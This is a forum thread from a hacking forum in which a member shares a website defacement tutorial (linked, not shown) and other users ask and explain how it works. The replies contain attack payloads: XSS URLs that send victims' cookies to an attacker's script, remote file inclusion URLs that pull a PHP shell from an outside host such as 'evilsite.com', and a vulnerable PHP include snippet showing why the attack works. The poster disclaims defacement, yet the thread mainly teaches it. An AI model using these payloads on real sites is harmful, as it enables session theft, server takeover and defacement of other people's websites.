Basic Website Defacement Tutorial

[Gogeta70]

Tutorial on basic methods of defacement by Gogeta70.

First thing's first, i DO NOT support defacing websites, it is against my own ethics, and the rules of suck-o for me to provide in depth information. However, all knowlege is free and can be used for both good and bad. It's up to you.

Note: Bad_brain, your HTML filter is pissing me off... -_-

http://g70net.com/deftut.txt

[floodhound2]

Very nice.

I don't deface websites but learning how it is done will help keep people from defacing mine.

[bad_brain]

meh...I know, I already said a couple of times I'll set the filter a little more strict, but you know how it is....there's always something happening that kinda keeps me away.... it's really on my list...

and yes, nice tut....
if anybody needs info on how to secure websites on server-level let me know, but because this will give away some info about MY server config it's only available to well known members....

[mo2332]

ty so much jk i know hoe to lol

[shamir]

looks nice not bad dude

[Gogeta70]

No problem guys, i hope it comes in useful.

[ebrizzlez]

Bravo, nice tut gogeta..

I just got one question. Well... maybe a few. xD

Code: Select all

http://yoursite.com/hijack.php?cookie=documentwrite

{Note the following code above didnt allow me to post the full code so i had to mess around with it till this finally worked so please bare with it.}

When I type this URL, the browser encodes the URL. Will the code still work, or does that mean it has been patched? Also, instead of using the cookie code, couldnt you somehow inject a message box with javascript as well? Also, how would you be able to see the cookie if you use the above code?

Code: Select all

http://www.somewebsite.com/index.php?module=http://yoursite.com/remote_shell.php

Also, I wouldnt understand much of this code. If you setup a script on your local site... what should be in this remote_shell.php file or w/e. Or would it just post the contents of the targets site into your site?


Thanks for the info though! Much apperciated.

[Gogeta70]

The first one takes the persons cookie, and if the script is written to do so, will write it into a file.

The 2nd one is a remote shell, which is a series of PHP script's that creates a mini site inside of the website that gives you administrator access.

[ebrizzlez]

Oh.... so wait...

Still a bit confused.

The first one is just a script on your own hosted site that steals the info from a user and logs it in through a cookie?

And I am not clear of the second method.

Sorry... for the noobish things. but i hate a question left be unasnwered to me..

[shamir]

I don't get it..........

[Gogeta70]

Ebrizzlez, say if my signature had a link that said "Click Me" and took you to http://g70net.com/cookiesteal.php?cookie=(script) document,write(document,cookie)( /scrpt) (modified html to bypass filter)

That would give cookiesteal.php your cookie information which i could do with as I please...

[ebrizzlez]

Oh.

Now I get it..

Thanks for the info.

[bishop]

Thanks for tut- being look for a good one:)
And no I don't deface sites- but still probably gonna try it on my own test site

[mo2332]

this confuses me

[bubzuru]

Code: Select all

http://www.somewebsite.com/index.php?module=http://yoursite.com/remote_shell.php

this would not work it would have to be
something more like this

Code: Select all

www.site.com/index.php?page=http://www.evilsite.com/shell.txt?cmd

you have to save the file you want to include with a .txt extension

but you can change this part

Code: Select all

index.php?page=

you just change that to the
path ov the vulnerable script

example :

Code: Select all

/uploads/uploadscript.php?page=

if the vunrable script was uploadscript.php

why does this work

example :

Code: Select all

<?php

   $file =$_GET['page']; //The page we wish to display

   include($file);

?>

What this means is that what ever is passed down to page will get included inside this php page.